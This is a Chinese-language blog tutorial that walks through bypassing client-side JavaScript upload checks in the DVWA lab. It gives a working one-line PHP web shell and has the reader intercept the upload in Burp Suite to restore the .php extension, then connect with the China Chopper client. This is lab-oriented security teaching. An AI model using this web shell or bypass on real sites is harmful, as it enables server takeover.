檔案上傳——客戶端檢測繞過(JavaScript檢測)(一)

雪痕*發表於2020-04-18

前言

通常再一個web程式中,一般會存在登陸註冊功能,登陸後一般會有上傳頭像等功能,如果上傳驗證不嚴格就可能造成攻擊者直接上傳木馬,進而控制整個web業務控制權。下面通過例項,如果程式只進行了客戶端JavaScript檢測,我們們如何來繞過。

正文

工具準備:DVWA程式,burpsuite,中國菜刀。

 

首先本地建立一個.txt文件,裡面寫入我們們的一句話木馬,然後將字尾名改為.php,一句話木馬為

<?php eval($_POST[-7]);?>      //連線菜刀的密碼為-7

然後開啟DVWA程式,將安全模式改為medium(中級),點選 File Upload模組,然後將我們們剛才建立的一句話.php檔案上傳,然後我們們發現被阻止了,只允許上傳JPEG和PNG兩種格式。

接下來。我們們將寫入一句話的檔案,字尾改為.png格式,然後通過burpsuite抓包

然後我們們發現,放行後,檔案成功上傳

然後我們們去根目錄找一找,果然找到了我們們上傳的檔案

接下來,開啟中國菜刀,輸入上傳木馬的路徑,輸入密碼,發現獲取到目標網站的webshell

總結

一,找到檔案上傳點,測試發現存在上傳漏洞。

二,發現只進行了客戶端JavaScript檢測。

三,通過burpsuite 抓包,修改檔案字尾名繞過檢測,上傳一句話木馬。

四,通過中國菜刀進行連線

五,獲取到目標網站webshell

 

相關文章